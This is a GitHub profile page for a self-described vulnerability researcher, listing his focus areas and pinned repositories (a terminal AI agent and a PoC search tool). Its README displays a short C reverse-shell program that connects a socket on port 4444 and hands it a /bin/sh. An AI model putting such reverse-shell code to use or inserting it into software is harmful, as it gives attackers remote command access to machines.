Skip to content
View shinthink's full-sized avatar
😴
Thinking...
😴
Thinking...

Block or report shinthink

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don’t include any personal information such as legal names or email addresses. Markdown is supported. This note will only be visible to you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
shinthink/README.md

     _     _       _   _     _       _    
 ___| |__ (_)_ __ | |_| |__ (_)_ __ | | __
/ __| '_ \| | '_ \| __| '_ \| | '_ \| |/ /
\__ \ | | | | | | | |_| | | | | | | |   < 
|___/_| |_|_|_| |_|\__|_| |_|_|_| |_|_|\_\
  

Vulnerability Research · Exploit Development · Reverse Engineering

Views


About

Security researcher focused on zero-day discovery and exploit development for web applications and CMS platforms. Published multiple critical CVEs with a focus on pre-authentication attack vectors.

Languages

Tools


/*
 * operator.c — no symbols, no debug info, no mercy
 * compile: gcc -s -fno-stack-protector -z execstack
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define PORT 4444

void _start() {
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sin = {
        .sin_family = AF_INET,
        .sin_port   = htons(PORT),
        .sin_addr   = { .s_addr = INADDR_ANY },
    };
    connect(sock, (struct sockaddr*)&sin, sizeof(sin));
    dup2(sock, 0); dup2(sock, 1); dup2(sock, 2);
    execve("/bin/sh", NULL, NULL);
}

GitHub

Research published for educational and authorized testing purposes only. CVEs under responsible disclosure.

Pinned Loading

  1. atar atar Public

    An autonomous terminal AI agent. Named after Ataraxia (ἀταραξία) — the Greek ideal of tranquility through clarity. Local-first, open-source, six AI providers, real tool execution.

    Python

  2. pocfinder pocfinder Public

    Interactive terminal tool to search Proof of Concept (PoC) repositories on GitHub with rich preview and caching.

    Shell 5